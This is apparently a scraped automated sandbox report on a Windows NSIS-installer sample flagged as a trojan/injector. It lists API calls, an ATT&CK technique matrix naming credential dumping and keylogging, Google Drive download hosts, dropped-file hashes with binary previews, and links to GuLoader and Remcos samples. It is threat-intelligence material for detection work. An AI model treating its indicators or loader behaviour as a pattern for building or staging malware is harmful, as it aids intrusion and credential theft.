      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeCode function: 0_2_6E4B1A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_6E4B1A98
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess created: C:\Users\user\Desktop\dIPYIbWXs1.exe "C:\Users\user\Desktop\dIPYIbWXs1.exe"Jump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Native API
      1
      DLL Side-Loading
      1
      Access Token Manipulation
      11
      Masquerading
      OS Credential Dumping311
      Security Software Discovery
      Remote Services1
      Archive Collected Data
      11
      Encrypted Channel
      Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
      Process Injection
      11
      Virtualization/Sandbox Evasion
      LSASS Memory11
      Virtualization/Sandbox Evasion
      Remote Desktop Protocol1
      Clipboard Data
      3
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      DLL Side-Loading
      1
      Access Token Manipulation
      Security Account Manager2
      File and Directory Discovery
      SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
      Process Injection
      NTDS23
      System Information Discovery
      Distributed Component Object ModelInput Capture14
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Obfuscated Files or Information
      LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading
      Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      dIPYIbWXs1.exe55%ReversingLabsWin32.Trojan.Leonem
      dIPYIbWXs1.exe100%AviraTR/Injector.mrwst
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\nscD2B5.tmp\System.dll0%ReversingLabs
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      http://nsis.sf.net/NSIS_Error0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      drive.google.com
      172.217.19.174
      truefalse
        high
        drive.usercontent.google.com
        142.250.181.1
        truefalse
          high
          NameSourceMaliciousAntivirus DetectionReputation
          https://www.google.comdIPYIbWXs1.exe, 00000006.00000003.4132764326.00000000069E2000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4105436260.00000000069DE000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4051589593.00000000069E3000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4022569615.00000000069E3000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4022621129.00000000069E3000.00000004.00000020.00020000.00000000.sdmpfalse
            high
            http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtddIPYIbWXs1.exe, 00000006.00000001.3911363957.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
              high
              http://nsis.sf.net/NSIS_ErrordIPYIbWXs1.exefalse
              • Avira URL Cloud: safe
              unknown
              https://translate.google.com/translate_a/element.jsdIPYIbWXs1.exe, 00000006.00000003.4132764326.00000000069E2000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4105436260.00000000069DE000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4051589593.00000000069E3000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4022569615.00000000069E3000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4022621129.00000000069E3000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                https://drive.google.com/dIPYIbWXs1.exe, 00000006.00000003.4132736489.00000000069DE000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4078866792.00000000069E3000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4132764326.00000000069E2000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000002.4149932805.00000000069DE000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000002.4149932805.0000000006977000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4078866792.00000000069DE000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  https://drive.google.com/ertificatesdIPYIbWXs1.exe, 00000006.00000003.4132736489.00000000069DE000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4078866792.00000000069E3000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4132764326.00000000069E2000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000002.4149932805.00000000069DE000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4105436260.00000000069DE000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214dIPYIbWXs1.exe, 00000006.00000001.3911363957.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
                      high
                      http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtddIPYIbWXs1.exe, 00000006.00000001.3911363957.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
                        high
                        http://www.ftp.ftp://ftp.gopher.dIPYIbWXs1.exe, 00000006.00000001.3911363957.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
                          high
                          https://drive.usercontent.google.com/dIPYIbWXs1.exe, 00000006.00000003.4132736489.00000000069DE000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4078866792.00000000069E3000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4042331790.00000000069E3000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4132764326.00000000069E2000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000002.4149932805.00000000069DE000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4105436260.00000000069DE000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4051589593.00000000069E3000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://apis.google.comdIPYIbWXs1.exe, 00000006.00000003.4132764326.00000000069E2000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4105436260.00000000069DE000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4051589593.00000000069E3000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4022569615.00000000069E3000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4022621129.00000000069E3000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://nsis.sf.net/NSIS_ErrorErrordIPYIbWXs1.exefalse
                                high
                                https://drive.google.com/ificatedIPYIbWXs1.exe, 00000006.00000003.4078866792.00000000069E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
                                  IPDomainCountryFlagASNASN NameMalicious
                                  142.250.181.1
                                  drive.usercontent.google.comUnited States
                                  15169GOOGLEUSfalse
                                  172.217.19.174
                                  drive.google.comUnited States
                                  15169GOOGLEUSfalse
                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1569083
                                  Start date and time:2024-12-05 12:51:07 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 8m 18s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:7
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:dIPYIbWXs1.exe
                                  renamed because original name is a hash value
                                  Original Sample Name:1236ae83fc231761095c68a7806bba187823dd2cb9de953f6ccf09e91e04eb97.exe
                                  Detection:MAL
                                  Classification:mal80.troj.evad.winEXE@3/8@2/2
                                  EGA Information:
                                  • Successful, ratio: 50%
                                  HCA Information:
                                  • Successful, ratio: 86%
                                  • Number of executed functions: 47
                                  • Number of non-executed functions: 29
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Override analysis time to 240s for sample files taking high CPU consumption
                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Execution Graph export aborted for target dIPYIbWXs1.exe, PID 2000 because there are no executed function
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size getting too big, too many NtCreateKey calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • VT rate limit hit for: dIPYIbWXs1.exe
                                  TimeTypeDescription
                                  06:55:57API Interceptor2x Sleep call for process: dIPYIbWXs1.exe modified
                                  No context
                                  No context
                                  No context
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  37f463bf4616ecd445d4a1937da06e19sNifdpWiY9.exeGet hashmaliciousMetasploit, MeterpreterBrowse
                                  • 142.250.181.1
                                  • 172.217.19.174
                                  payload_1.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                  • 142.250.181.1
                                  • 172.217.19.174
                                  List of Required items xlsx.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                  • 142.250.181.1
                                  • 172.217.19.174
                                  ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                  • 142.250.181.1
                                  • 172.217.19.174
                                  REQUEST FOR QUOATION AND PRICES 0106-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                  • 142.250.181.1
                                  • 172.217.19.174
                                  comp#U00e1rtilhar080425-000800-66000544000.exeGet hashmaliciousUnknownBrowse
                                  • 142.250.181.1
                                  • 172.217.19.174
                                  file.exeGet hashmaliciousUnknownBrowse
                                  • 142.250.181.1
                                  • 172.217.19.174
                                  file.exeGet hashmaliciousUnknownBrowse
                                  • 142.250.181.1
                                  • 172.217.19.174
                                  comp#U00e1rtilhar080425-000800-66000544000.exeGet hashmaliciousUnknownBrowse
                                  • 142.250.181.1
                                  • 172.217.19.174
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  C:\Users\user\AppData\Local\Temp\nscD2B5.tmp\System.dlleAvqHiIsgR.exeGet hashmaliciousGuLoaderBrowse
                                    eAvqHiIsgR.exeGet hashmaliciousGuLoaderBrowse
                                      RFQ-24064562-SUPPLY-NOv-ORDER.com.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                        LkzvfB4VFj.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          LkzvfB4VFj.exeGet hashmaliciousGuLoaderBrowse
                                            z120X20SO__UK__EKMELAMA.exeGet hashmaliciousGuLoader, RemcosBrowse
                                              Quotation-GINC-19-00204.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                Produkttyper.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  Impressionist.exeGet hashmaliciousGuLoaderBrowse
                                                    PAGO.exeGet hashmaliciousGuLoaderBrowse
                                                      Process:C:\Users\user\Desktop\dIPYIbWXs1.exe
                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):11776
                                                      Entropy (8bit):5.854450882766351
                                                      Encrypted:false
                                                      SSDEEP:192:jPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4I:u7VpNo8gmOyRsVc4
                                                      MD5:34442E1E0C2870341DF55E1B7B3CCCDC
                                                      SHA1:99B2FA21AEAD4B6CCD8FF2F6D3D3453A51D9C70C
                                                      SHA-256:269D232712C86983336BADB40B9E55E80052D8389ED095EBF9214964D43B6BB1
                                                      SHA-512:4A8C57FB12997438B488B862F3FC9DC0F236E07BB47B2BCE6053DCB03AC7AD171842F02AC749F02DDA4719C681D186330524CD2953D33CB50854844E74B33D51
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Joe Sandbox View:
                                                      • Filename: eAvqHiIsgR.exe, Detection: malicious, Browse
                                                      • Filename: eAvqHiIsgR.exe, Detection: malicious, Browse
                                                      • Filename: RFQ-24064562-SUPPLY-NOv-ORDER.com.exe, Detection: malicious, Browse
                                                      • Filename: LkzvfB4VFj.exe, Detection: malicious, Browse
                                                      • Filename: LkzvfB4VFj.exe, Detection: malicious, Browse
                                                      • Filename: z120X20SO__UK__EKMELAMA.exe, Detection: malicious, Browse
                                                      • Filename: Quotation-GINC-19-00204.exe, Detection: malicious, Browse
                                                      • Filename: Produkttyper.exe, Detection: malicious, Browse
                                                      • Filename: Impressionist.exe, Detection: malicious, Browse
                                                      • Filename: PAGO.exe, Detection: malicious, Browse
                                                      Reputation:moderate, very likely benign file
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....`...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\dIPYIbWXs1.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):210093
                                                      Entropy (8bit):7.502700121282951
                                                      Encrypted:false
                                                      SSDEEP:6144:f7wFK87cxzGweAviFN6KGCx2Qxo2AvCDG6P:fe7cs0KFEjQxo23B
                                                      MD5:B509D01147AF9F5FF51786E462472C80
                                                      SHA1:3081D1F6DD366EB3AA1ED3BAA1356E74B6E35E63
                                                      SHA-256:2A27D685E02EA3783C98AA267333B802A8CD50347556464B892D535DFDE46DE8
                                                      SHA-512:4BCB1D76FBB3A94AEB9B24D113250BB19785965B1C9F8EBD618426F8855AE67A1886BB51B2B80DEE4C7F969FD947AF1CEE42403095122BFF5333DE2012016639
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.....VVV......}}}....................//.....jj.......B..................999......\\\\...T.+++.Z............++++.....dd........===.....E....OOO..6....++..RRRR..........%..............................IIII...........|................GGGG.<..\..d..................V..c........L....///....nnn.....7...........;;;.......'...........=.@..............Q..................!.........{{{{{.......F.................h.H...r..............yy.............c........}}}...................VVVVVV....................6666.....++....ii.........\..................gg...........%............U...5...O.....B...................==..........bbb.4444...yyy..$$...........[[............."...................C..............L........................iii.......**....L........7..................kkk..............................ee.7..X.....~~...,.%.WW....{.IIII....................???....bbbb........).............aaa..uuu.ff..........+..X....3...99.........................,....C.s...1..NNNNNN.....,,....5........z..U....qq.....B.....
                                                      Process:C:\Users\user\Desktop\dIPYIbWXs1.exe
                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                      Category:dropped
                                                      Size (bytes):461226
                                                      Entropy (8bit):2.6494643206930517
                                                      Encrypted:false
                                                      SSDEEP:1536:QQ5Am9szdb4p6MGKluF9aurMo7giAeTHNJDyq4HvZTAG73lLkjITTbpnEq8rbt4l:cm36nrJ8lvqmBpY05VKpTPEhsPjgf2g
                                                      MD5:F8459F552184AAE64D3C4F49A1E22FB3
                                                      SHA1:D4ECA106AF335EA7B7A12FFD97A42A7D0CA93D1E
                                                      SHA-256:E7737983C55481BFF4EC8F19A59BE2F78AA8F98264473CB8AA012EE7C07B0AD7
                                                      SHA-512:6F97BE49801E235D9E8881728117D4BD096009631F274758CEA5E8AAAAF57B4C92B501FB2C84A4D32A7831615B3310C056BFC661D00262DCF8B1A3F77B7DDD27
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:00FAFA007F00BE0000000091910004000000008383830000B5B500979700909000000E0000B300F4F4F4F4F400008A8A00009F9F9F9F9F0000003300005252520000001212000000770000009E00A6A6A60000003D000000000000A20000F0F0F000C1C10000B2B200DC00999900EA002500ABABAB00797900353500A4003D3D00F70000000A0A0A000000B2B2000B0B0074003F00000B00000F0F0F0F0F0F0F0F00B2002F00000000004E0000F8F800000001010101010100F6F60000450000484800610000C1C1C1C1000E00000000BEBE00490000003F002727000000636363636300D3D3D3D300EC00007E7E7E003535353500A50000008A8A0000CC00000000500000006400B4B40000000000D20000393900CDCD00A3000000000000B600210000370000FDFDFDFD000000007000A6A6A600AF000000000E0E0E00AB000000040000360000000000660000840000000000000000EF002600000005004500A9000000000000F2F20000000000000027006B000000003900000D0D00DD004C4C0000D7D7D7D700D2D2D2D2000070000020000000000020000000002E2E2E00373700BABABA001F000000121212000000006464646400008A8A0000610015003C3C3C3C005200E90042420000002727000000F700001A00A600E5E5006C6C00007B7B00000D0D00C0C0C0C000009300000000
                                                      Process:C:\Users\user\Desktop\dIPYIbWXs1.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):485127
                                                      Entropy (8bit):1.2565961974341746
                                                      Encrypted:false
                                                      SSDEEP:768:bgBMgq+aLnwfPnz/Km1iLGyDPiU55NCk+T93YpnK77oTpvYP3knePjlW0kwNGL+q:XQ3wvosOsCpxFJrXSBmHzTu58UR
                                                      MD5:580D05E679E74B036B55CA8E5FF32769
                                                      SHA1:10175C43AB7B725FFFCF770EB2C3555E91D3BA13
                                                      SHA-256:B3E34975017C193D4672BEC42BC52B55F8AE1F1D5F30D56DCFD0B3A4242C3BE4
                                                      SHA-512:0E26F0084BED372785A5E8C8BE3A0717074AA52C2E8B5413FA9F2CB8DEED40BF8BDBF15C411EFFA432A8B96E50AE6085E8F90A97350827AFAA1BE1AB4B3E1643
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview:.................3.........................................=.....................................`.............................................................................n........................... .L.........................(,.b...e.......\...............................u.....................[.............................n........................[........................................c...........................W...........................................................*..].h.............R..............................................*............................^.....$.....w...................................................p...............................................................$.t...................................w*....................b....E.......................|.............5.......E................................................P.........d..................vl...........}..."..................................1.............................k.....7...............
                                                      Process:C:\Users\user\Desktop\dIPYIbWXs1.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):389868
                                                      Entropy (8bit):1.2469892412772452
                                                      Encrypted:false
                                                      SSDEEP:768:8mGX5iY6YFC1hSNYG8n6aCKBHwcX7e3ZNrt7qNIxKpGEopKfWOO72cDEDQ+7IF5i:m5ittaAwW6q8KH13QyOgs2w
                                                      MD5:2A500E1219C4894E2D45C32C5A5A11FD
                                                      SHA1:AC9A88DE4C84E1EB8A535E1061CBC6584380D24E
                                                      SHA-256:C65F223375C6DFE8CE71213D5DD24F39CDE31F772D2C66521BF07B21BE45E6C1
                                                      SHA-512:89ED91AF91CF969FE7EC087EE107B52959582615EFB2AB72A21D6C3820E5BDDA78EE02EB39BB323FD996D85510627387616DF8917B12052A62D288D8E9448596
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview:...........................E.....................................................................<......................].....f........................_...G..........S....................................@...............j...................................................I...................|..C..........................................................d......%t..........N..................d...Q...........p....3..........................................L...........y...............................-........................................................................@.........]..3........A................................*............................................................................................@...........(............................{..4......................................k.................{.....................W.................,......+...............K....b.......................!.............................H..)..........................E..........................
                                                      Process:C:\Users\user\Desktop\dIPYIbWXs1.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):442363
                                                      Entropy (8bit):1.2533707838755617
                                                      Encrypted:false
                                                      SSDEEP:1536:f6KFImN7hPg1fMcZ9pkK6m1rmkrDAji7VW9EgfrY:PyMtabPE+7ctfM
                                                      MD5:5465B75724C031B21C018F7D72941F72
                                                      SHA1:98176B27A41A35401A96D0AAC0859EEC25A4C5FE
                                                      SHA-256:7390780C6FB1F7B57C950A11AE287127CB6144CE9AD1C26E8C242BADB685729B
                                                      SHA-512:7084191B13FF854943DEE9FB6DDC1D7F89D06055FF4DA7E04DA1C359B557AC22762209B8DFE061F3AF628DF077E1D1D1009E9F9A18E3C9441AEE7FD4FDFF1688
                                                      Malicious:false
                                                      Preview:.........................................................................|......................................v..g..................................................................C...........`.......................................... ...............#.....................K..0.................\................................4.......................................y...................."........k..............9.H.................................................................."...........m............................6...................................................E..)..........[..............TZ..............Q............_...........$...... ..........................W....................................................y..................................q......!.................................... .....................o..........*........................................................................[..............9..................s....;..........................................
                                                      Process:C:\Users\user\Desktop\dIPYIbWXs1.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):521
                                                      Entropy (8bit):4.284169749449499
                                                      Encrypted:false
                                                      SSDEEP:12:7+SriF8i+WUQDJBYqRIE47W0BvM71ARi9ulhji4JDQCr6K:7tuZ+d6/GEUI18jhJsCr6K
                                                      MD5:B089BD0CBC944DE0B1023E6CE9318BD3
                                                      SHA1:715FA74E243D5C3419519E7371ED1836C9BCFA4A
                                                      SHA-256:1E8ABB4A5E85595B0EF2FC73E9012EDDFE1BCB7363E90A2EA46F561DD3742F93
                                                      SHA-512:A164EB2AB02E612E9F96531006C4A71B8D6E8EA6444D86907CB15EF2C1AAB4680EAF3BB580C6A1D5B89A3F454F3E532242FC1DE2B71A9FFF56F812F6E4638885
                                                      Malicious:false
                                                      Preview:dibasic skinnebenssaarenes rembrandt unembayed timerne ependytes overtorturing.ruskindenes cellemembranen visirs daarligste bartholomeuss eslabon trflen communizations karikaturtegners forsgsstadiet hillocked..perfumers afplukker simonized jubilumsmiddags dolktids spokane milliontedel indfoertes dour..margented pomerans semicylindrical skifferolies kernerelationerne univalent,tiltrdelsesforelsning hydrion caggy stabejserne figurist vt klutzier bendy hanekamme..duilin molompi cuartino fornagl tortricoidea unhurrying.
                                                      Process:C:\Users\user\Desktop\dIPYIbWXs1.exe
                                                      File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                      Category:dropped
                                                      Size (bytes):726
                                                      Entropy (8bit):3.2589952341453956
                                                      Encrypted:false
                                                      SSDEEP:12:8wl0BsXowAOcIGlnEE6ReRqNE9Rw3w/g/3NJkKAd4t2YZ/elFlSJm:8SLkvgeMNyr/49HAvqy
                                                      MD5:E4FEBE492ACF72DF599F0FD64297A1F7
                                                      SHA1:C4E3BF8BBBE2664821D6D445E3DCD212316CA772
                                                      SHA-256:C09FE432B453D809766DA481C13D9699F119103DD19FFF0D22101A2F16641238
                                                      SHA-512:B5B63EDADDB117BBC4CE88891667234C8A3DFE538F2F517B563B0B3868105CD2327AF41A229DD2A1ED3314057E0033062BFBA823021F2B27FA1CB4E574EB8730
                                                      Malicious:false
                                                      Preview:L..................F........................................................;....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....l.2...........Disannex.And37..N............................................D.i.s.a.n.n.e.x...A.n.d.3.7.............\.U.s.e.r.s.\.j.o.n.e.s.\.D.i.s.a.n.n.e.x...A.n.d.3.7.#.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.t.r.a.n.c.h.e.t.\.T.r.y.k.m.a.a.l.e.r.e.........(.................l^".`G...3..qs................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.2.................
                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                      Entropy (8bit):7.543808382353923
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:dIPYIbWXs1.exe
                                                      File size:886'680 bytes
                                                      MD5:da70482b3bd657ff83625fbcf998ec60
                                                      SHA1:864575ce9283c21c44bad550416ff35f3d38cb0f
                                                      SHA256:1236ae83fc231761095c68a7806bba187823dd2cb9de953f6ccf09e91e04eb97
                                                      SHA512:b2fd7b3ed0f70fc9fcbfdebc96eaf7bff3fb108747555e1c215b824b97601d81c85a895ec43184df00e4b673ab3eeb7051c90eecb367bc18ea09e120c920f66d
                                                      SSDEEP:24576:jiGFaq43NvCEILxHx6CujTrld48tcv97J/QOea:jiGFu3NvXOHKddUNJ/qa
                                                      TLSH:25152266F640C8ABE4398F30586FD05AEBD97E5914910F6B3FADBB1EB9B1090C00F116
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG..sw..PG..VA..PG.Rich.PG.........PE..L... ..`.................f...|......H3............@
                                                      Icon Hash:0e13672535353f1c
                                                      Entrypoint:0x403348
                                                      Entrypoint Section:.text
                                                      Digitally signed:true
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x60FC9220 [Sat Jul 24 22:20:16 2021 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:ced282d9b261d1462772017fe2f6972b
                                                      Signature Valid:false
                                                      Signature Issuer:CN="Whiskyernes Bawdrick ", E=Halvbrdrene@Mejslingens.Gas, L=Noyelles-sous-Lens, S=Hauts-de-France, C=FR
                                                      Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                      Error Number:-2146762487
                                                      Not Before, Not After
                                                      • 29/06/2024 09:14:31 29/06/2027 09:14:31
                                                      Subject Chain
